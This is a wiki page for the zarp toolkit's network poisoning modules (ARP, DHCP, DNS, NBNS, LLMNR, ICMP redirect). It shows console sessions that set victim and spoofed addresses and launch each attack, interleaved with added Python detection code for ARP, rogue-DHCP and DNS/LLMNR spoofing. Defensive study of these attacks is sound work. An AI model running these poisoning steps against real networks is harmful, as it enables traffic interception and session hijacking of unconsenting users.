bryan alexander edited this page Jul 29, 2014 · 1 revision

These modules work as expected: they poison a host's view of the network as the first step of MitM, session hijacking, and similar attacks. Currently included are ARP, DNS, DHCP, NBNS, ICMP redirect, and LLMNR.

ARP

ARP poisoning is the cornerstone of the zarp toolkit; information on the attack can be found in the linked page above.

bryan@debdev:~/tools/zarp$ sudo ./zarp.py 
[!] Loaded 34 modules.
	 ____   __   ____  ____
	(__  ) / _\ (  _ \(  _ '
	 / _/ /    \ )   / ) __/
	(____)\_/\_/(__\_)(__)  [Version: 0.1.5]

	[1] Poisoners    	[5] Parameter
	[2] DoS Attacks  	[6] Services 
	[3] Sniffers     	[7] Attacks  
	[4] Scanners     	[8] Sessions 

0) Back
> 1 1
	+-----+------------------------------------+-------+------+----------+-
	|     | Option                             | Value | Type | Required | 
	+-----+------------------------------------+-------+------+----------+-
	| [1] | Interval to send respoofed packets | 2     | int  | False    | 
	+-----+------------------------------------+-------+------+----------+-
	| [2] | Address to spoof from target       | None  | ip   | True     | 
	+-----+------------------------------------+-------+------+----------+-
	| [3] | Target to poison                   | None  | ip   | True     | 
	+-----+------------------------------------+-------+------+----------+-
0) Back
ARP Spoof > 3 192.168.1.219
ARP Spoof > 2 192.168.1.1
ARP Spoof > 1 5
	+-----+------------------------------------+---------------+------+----------+-
	|     | Option                             | Value         | Type | Required | 
	+-----+------------------------------------+---------------+------+----------+-
	| [1] | Interval to send respoofed packets | 5             | int  | False    | 
	+-----+------------------------------------+---------------+------+----------+-
	| [2] | Address to spoof from target       | 192.168.1.1   | ip   | True     | 
	+-----+------------------------------------+---------------+------+----------+-
	| [3] | Target to poison                   | 192.168.1.219 | ip   | True     | 
	+-----+------------------------------------+---------------+------+----------+-
ARP Spoof > r
[!] Initializing ARP poison...
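As an added defender-side example (not part of zarp or this page): the periodic replies this module sends show up on the wire as the gateway IP being claimed by a second MAC address. The watcher below decodes raw ARP frames with the standard library only and flags such a binding change; the MACs and frames are constructed test data and the gateway address is assumed to be 192.168.1.1 as in the session above.

```python
import struct
from ipaddress import IPv4Address

ETH_TYPE_ARP = 0x0806
ARP_REPLY = 2

def parse_arp(frame: bytes):
    """Decode an Ethernet II frame carrying IPv4-over-Ethernet ARP; None if it is not one."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_TYPE_ARP:
        return None
    htype, ptype, hlen, plen, oper = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"op": oper,
            "sha": frame[22:28].hex(":"), "spa": str(IPv4Address(frame[28:32])),
            "tha": frame[32:38].hex(":"), "tpa": str(IPv4Address(frame[38:42]))}

class ArpWatch:
    """Remember the MAC first seen for each IP and flag any later reply that claims
    a protected IP (the gateway, say) from a different MAC."""
    def __init__(self, protected_ips):
        self.protected = set(protected_ips)
        self.bindings = {}                    # ip -> first MAC seen claiming it
    def observe(self, frame: bytes):
        arp = parse_arp(frame)
        if arp is None or arp["op"] != ARP_REPLY:
            return None
        ip, mac = arp["spa"], arp["sha"]
        known = self.bindings.setdefault(ip, mac)
        if known != mac and ip in self.protected:
            return f"ARP binding change for {ip}: {known} -> {mac}"
        return None

def build_arp_reply(sha, spa, tha, tpa):
    """Constructed sample frame used as test data (not captured traffic)."""
    def mac(s):
        return bytes.fromhex(s.replace(":", ""))
    eth = mac(tha) + mac(sha) + struct.pack("!H", ETH_TYPE_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp += mac(sha) + IPv4Address(spa).packed + mac(tha) + IPv4Address(tpa).packed
    return eth + arp
```

Feeding frames from a live capture (for example via a raw socket or a pcap reader) into observe() turns this into a minimal arpwatch; the first binding seen is trusted, so seed bindings from a known-good state where possible.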

DHCP Spoofing

There are a couple of ways to do DHCP poisoning; zarp implements it by deploying a 'rogue' DHCP server that listens for DHCP-ACK or DHCP-DISCOVER packets. When a DHCP-DISCOVER is detected, an IP address is reserved and assigned to the host, and an ARP poisoning session against it is started automatically. When a DHCP-ACK is detected, zarp attempts to hand out the address the client is requesting; this happens when a returning device wants its previous IP address back. If that address cannot be given, a new one is generated and handed out.

	+-----+--------------------------------+-------+--------+----------+-
	|     | Option                         | Value | Type   | Required | 
	+-----+--------------------------------+-------+--------+----------+-
	| [1] | Netmask to distribute IPs from | None  | ipmask | True     | 
	+-----+--------------------------------+-------+--------+----------+-
	| [2] | Spoofed gateway address        | None  | ip     | True     | 
	+-----+--------------------------------+-------+--------+----------+-
0) Back
DHCP Spoof > 1 192.168.2.1/24
DHCP Spoof > 2 192.168.1.1
	+-----+--------------------------------+----------------+--------+----------+-
	|     | Option                         | Value          | Type   | Required | 
	+-----+--------------------------------+----------------+--------+----------+-
	| [1] | Netmask to distribute IPs from | 192.168.2.1/24 | ipmask | True     | 
	+-----+--------------------------------+----------------+--------+----------+-
	| [2] | Spoofed gateway address        | 192.168.1.1    | ip     | True     | 
	+-----+--------------------------------+----------------+--------+----------+-
0) Back
DHCP Spoof > r
[!] Configuring rogue DHCP server...
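An added example, not zarp's code: an offer from the rogue server configured above would carry a server identifier and a lease from 192.168.2.0/24 that do not match the segment's real DHCP server. The checker below parses a DHCP OFFER (BOOTP header plus options 53, 54 and 3) and compares it against an allow-list; the trusted server, expected subnet and the sample packets are assumed values constructed for the test.

```python
import struct
from ipaddress import IPv4Address, IPv4Network

BOOTREPLY, DHCPOFFER, MAGIC = 2, 2, b"\x63\x82\x53\x63"

def parse_dhcp(payload: bytes):
    """Decode the BOOTP fixed header and the DHCP option TLVs of a UDP payload."""
    if len(payload) < 240 or payload[236:240] != MAGIC:
        return None
    op, yiaddr = payload[0], str(IPv4Address(payload[16:20]))
    opts, off = {}, 240
    while off < len(payload) and payload[off] != 0xFF:        # 0xFF = end option
        code = payload[off]
        if code == 0:                                         # pad option has no length
            off += 1
            continue
        length = payload[off + 1]
        opts[code] = payload[off + 2:off + 2 + length]
        off += 2 + length
    return {"op": op, "yiaddr": yiaddr, "opts": opts}

def check_offer(payload, trusted_servers, expected_net, expected_router):
    """Return findings for a DHCP OFFER that disagrees with the segment's known-good
    configuration; an empty list means the offer looks legitimate."""
    d = parse_dhcp(payload)
    if d is None or d["op"] != BOOTREPLY or d["opts"].get(53) != bytes([DHCPOFFER]):
        return []
    findings = []
    server = str(IPv4Address(d["opts"].get(54, b"\0\0\0\0")[:4]))    # server identifier
    if server not in trusted_servers:
        findings.append(f"offer from untrusted DHCP server {server}")
    if IPv4Address(d["yiaddr"]) not in IPv4Network(expected_net, strict=False):
        findings.append(f"offered address {d['yiaddr']} outside {expected_net}")
    router = str(IPv4Address(d["opts"].get(3, b"\0\0\0\0")[:4]))     # first router
    if router != expected_router:
        findings.append(f"offer advertises router {router}, expected {expected_router}")
    return findings

def build_offer(xid, yiaddr, server_id, router):
    """Constructed sample OFFER used as test data (not captured traffic)."""
    fixed = struct.pack("!BBBBIHH", BOOTREPLY, 1, 6, 0, xid, 0, 0)
    fixed += b"\0" * 4 + IPv4Address(yiaddr).packed + b"\0" * 8   # ciaddr yiaddr siaddr giaddr
    fixed += b"\0" * (16 + 64 + 128)                               # chaddr sname file
    opts = bytes([53, 1, DHCPOFFER, 54, 4]) + IPv4Address(server_id).packed
    opts += bytes([3, 4]) + IPv4Address(router).packed + b"\xff"
    return fixed + MAGIC + opts
```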

DNS Poisoning

DNS poisoning is performed by matching DNS requests against the configured regex and responding with a forged answer.

> 2
	+-----+-----------------------------+-------+-------+----------+-
	|     | Option                      | Value | Type  | Required | 
	+-----+-----------------------------+-------+-------+----------+-
	| [1] | Regex to match DNS          | None  | regex | True     | 
	+-----+-----------------------------+-------+-------+----------+-
	| [2] | Host to spoof requests from | None  | ip    | False    | 
	+-----+-----------------------------+-------+-------+----------+-
	| [3] | Redirect DNS request to     | None  | str   | True     | 
	+-----+-----------------------------+-------+-------+----------+-
0) Back
DNS Spoof > 1 ^.*$ 
DNS Spoof > 2 192.168.1.219
DNS Spoof > 3 192.168.1.97
	+-----+-----------------------------+---------------+-------+----------+-
	|     | Option                      | Value         | Type  | Required | 
	+-----+-----------------------------+---------------+-------+----------+-
	| [1] | Regex to match DNS          | ^.*$          | regex | True     | 
	+-----+-----------------------------+---------------+-------+----------+-
	| [2] | Host to spoof requests from | 192.168.1.219 | ip    | False    | 
	+-----+-----------------------------+---------------+-------+----------+-
	| [3] | Redirect DNS request to     | 192.168.1.97  | str   | True     | 
	+-----+-----------------------------+---------------+-------+----------+-
0) Back
DNS Spoof > r
[!] Starting DNS spoofer...

NBNS Spoofing

NBNS is a Windows broadcast protocol that is a lot like ARP: there is no authentication, and arbitrary responses are accepted. This module listens for NBNS requests, matches the requested names against a regex, and spoofs the response to send the victim to the chosen address.

> 4
	+-----+---------------------+-------+-------+----------+-
	|     | Option              | Value | Type  | Required | 
	+-----+---------------------+-------+-------+----------+-
	| [1] | Match request regex | None  | regex | True     | 
	+-----+---------------------+-------+-------+----------+-
	| [2] | Redirect to         | None  | ip    | True     | 
	+-----+---------------------+-------+-------+----------+-
0) Back
NBNS Poison > 1 ^.*$
NBNS Poison > 2 192.168.1.97
	+-----+---------------------+--------------+-------+----------+-
	|     | Option              | Value        | Type  | Required | 
	+-----+---------------------+--------------+-------+----------+-
	| [1] | Match request regex | ^.*$         | regex | True     | 
	+-----+---------------------+--------------+-------+----------+-
	| [2] | Redirect to         | 192.168.1.97 | ip    | True     | 
	+-----+---------------------+--------------+-------+----------+-
0) Back
NBNS Poison > r
[!] Starting NBNS spoofer...

LLMNR

LLMNR (Link-local Multicast Name Resolution) is a Windows broadcast protocol that supersedes NBNS (Vista and up). It operates in essentially the same way.

> 5
	+-----+---------------------+-------+-------+----------+-
	|     | Option              | Value | Type  | Required | 
	+-----+---------------------+-------+-------+----------+-
	| [1] | Match request regex | None  | regex | True     | 
	+-----+---------------------+-------+-------+----------+-
	| [2] | Redirect to         | None  | ip    | True     | 
	+-----+---------------------+-------+-------+----------+-
0) Back
LLMNR Spoofer > 1 ^.*$
LLMNR Spoofer > 2 192.168.1.97
	+-----+---------------------+--------------+-------+----------+-
	|     | Option              | Value        | Type  | Required | 
	+-----+---------------------+--------------+-------+----------+-
	| [1] | Match request regex | ^.*$         | regex | True     | 
	+-----+---------------------+--------------+-------+----------+-
	| [2] | Redirect to         | 192.168.1.97 | ip    | True     | 
	+-----+---------------------+--------------+-------+----------+-
0) Back
LLMNR Spoofer > r
[!] Starting LLMNR spoofer...
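An added example serving both the DNS Poisoning section and the NBNS/LLMNR sections (not zarp's code): because the spoofer answers every matched query while the real resolver still answers too, a client sees two replies with the same transaction ID and different addresses; and because LLMNR replies use the DNS wire format, the same parser can check whether a name no host owns (a canary) ever gets an answer, which is the classic way to spot an LLMNR spoofer. NBNS encodes names differently and is not parsed here; all packets below are constructed test data.

```python
import struct
from ipaddress import IPv4Address

def _read_name(msg, off):
    labels = []                                                  # returns (name, offset after it)
    while True:
        n = msg[off]
        if n == 0:
            return ".".join(labels), off + 1
        if (n & 0xC0) == 0xC0:                                   # compression pointer
            tail, _ = _read_name(msg, struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF)
            return ".".join(labels + [tail]), off + 2
        labels.append(msg[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n

def parse_response(msg):
    """Return (txid, question name, [IPv4 answers]) for a DNS- or LLMNR-format reply."""
    txid, _flags, _qdcount, ancount = struct.unpack("!HHHH", msg[:8])
    qname, off = _read_name(msg, 12)
    off += 4                                                     # skip QTYPE, QCLASS
    answers = []
    for _ in range(ancount):
        _, off = _read_name(msg, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:                            # A record
            answers.append(str(IPv4Address(msg[off:off + 4])))
        off += rdlen
    return txid, qname, answers

class AnswerConflictDetector:
    """Flag a second reply to one transaction with different addresses: resolver and spoofer both answered."""
    def __init__(self):
        self.seen = {}                                           # (txid, name) -> first answer set
    def observe(self, msg):
        txid, qname, answers = parse_response(msg)
        first = self.seen.setdefault((txid, qname.lower()), set(answers))
        if first != set(answers):
            return f"conflicting answers for {qname} (txid {txid:#06x}): {sorted(first)} vs {answers}"
        return None

def canary_hit(msg, canary):
    _, qname, answers = parse_response(msg)                      # LLMNR canary: nobody owns this name,
    return qname.lower() == canary.lower() and bool(answers)     # so any answer means a spoofer replied

def build_response(txid, qname, addr):  # constructed one-answer A reply for the test, not a zarp packet
    q = b"".join(bytes([len(l)]) + l.encode() for l in qname.split(".")) + b"\x00"
    hdr = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    ans = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 60, 4) + IPv4Address(addr).packed
    return hdr + q + b"\x00\x01\x00\x01" + ans
```

In practice the conflict detector is fed every UDP/53 response seen on a mirror port, and the canary check is run against replies to a periodic LLMNR query for a deliberately bogus name.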

ICMP Redirect

ICMP redirect attacks (see "ICMP Attacks Illustrated", http://www.sans.org/reading-room/whitepapers/threats/icmp-attacks-illustrated-477?show=icmp-attacks-illustrated-477&cat=threats) are rather archaic and disabled on many hosts, but occasionally you may run into a system that's susceptible.

	+-----+------------------------------------------------+-------+------+----------+-
	|     | Option                                         | Value | Type | Required | 
	+-----+------------------------------------------------+-------+------+----------+-
	| [1] | Redirect victim to                             | None  | ip   | True     | 
	+-----+------------------------------------------------+-------+------+----------+-
	| [2] | Interval (seconds) to send respoofed redirects | 15    | int  | False    | 
	+-----+------------------------------------------------+-------+------+----------+-
	| [3] | Redirect host                                  | None  | ip   | True     | 
	+-----+------------------------------------------------+-------+------+----------+-
0) Back
ICMP Redirection > 1 192.168.1.97
ICMP Redirection > 3 192.168.1.219
	+-----+------------------------------------------------+---------------+------+----------+-
	|     | Option                                         | Value         | Type | Required | 
	+-----+------------------------------------------------+---------------+------+----------+-
	| [1] | Redirect victim to                             | 192.168.1.97  | ip   | True     | 
	+-----+------------------------------------------------+---------------+------+----------+-
	| [2] | Interval (seconds) to send respoofed redirects | 15            | int  | False    | 
	+-----+------------------------------------------------+---------------+------+----------+-
	| [3] | Redirect host                                  | 192.168.1.219 | ip   | True     | 
	+-----+------------------------------------------------+---------------+------+----------+-
0) Back
ICMP Redirection > r
[!] Initializing ICMP poison...